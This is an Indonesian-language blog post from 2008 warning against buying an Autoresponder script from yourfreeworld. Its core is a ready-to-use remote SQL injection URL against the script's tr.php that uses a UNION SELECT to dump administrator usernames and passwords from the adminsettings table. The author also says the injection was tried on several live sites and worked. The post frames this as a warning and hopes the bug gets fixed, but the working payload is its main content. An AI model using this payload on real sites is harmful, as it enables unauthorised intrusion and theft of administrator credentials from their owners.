24 Aug 2008

Autoresponder Exploitz

Buat anda yang tertarik membeli script Autoresponder dari situs yourfreeworld, urungkan niat anda. Karena script ini sangat mudah diexploit!
Gimana caranya?
Begini syntax Remote SQL Injection-nya:

www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--

Hmmm.. bahaya juga nih.. Udah coba beberapa situs, ternyata berhasil.

Semoga cepat diperbaiki bug-nya...



0 komentar:

Label's

Blog Archive

What's up doc?



Tebak Hari Lahir

When were you born?

Powered by Blogger.

Followers


 

Design by Blogger Buster | Distributed by Blogging Tips